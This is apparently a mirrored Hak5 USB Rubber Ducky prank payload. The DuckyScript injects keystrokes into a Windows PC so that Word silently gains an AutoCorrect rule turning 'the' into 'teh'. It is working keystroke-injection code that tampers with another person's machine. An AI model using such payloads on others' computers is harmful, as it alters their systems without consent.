Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/AUTOinCORRECT/payload.txt
2968 views
1
REM Title: AUTOinCORRECT
2
REM Author: the-jcksn
3
REM Description: Creates a custom Microsoft Word Autocorrect rule, default sets rule to change "the" to "teh". Can be changed to any words you wish.
4
REM Target: Windows 10 / Microsoft Word
5
REM Version: 1.0
6
REM Category: Prank
7
8
DELAY 2000
9
REM OPEN NEW MICROSOFT WORD DOCUMENT
10
GUI r
11
DELAY 200
12
STRING winword
13
ENTER
14
DELAY 1000
15
ENTER
16
DELAY 200
17
REM EDIT AUTOCORRECT RULES
18
ALT q
19
DELAY 300
20
STRING options spelling
21
DELAY 500
22
ENTER
23
DELAY 200
24
TAB
25
DELAY 200
26
ENTER
27
DELAY 200
28
REM AUTOCORRECT "the" TO "teh" ~~~ change these below to whatever words you want to add a rule for ~~~~~
29
STRING the
30
DELAY 200
31
TAB
32
STRING teh
33
DELAY 200
34
ALT a
35
DELAY 200
36
REM SAVE AND EXIT
37
ENTER
38
DELAY 200
39
SHIFT TAB
40
DELAY 200
41
ENTER
42
DELAY 200
43
ALT F4
44
DELAY 200
45
46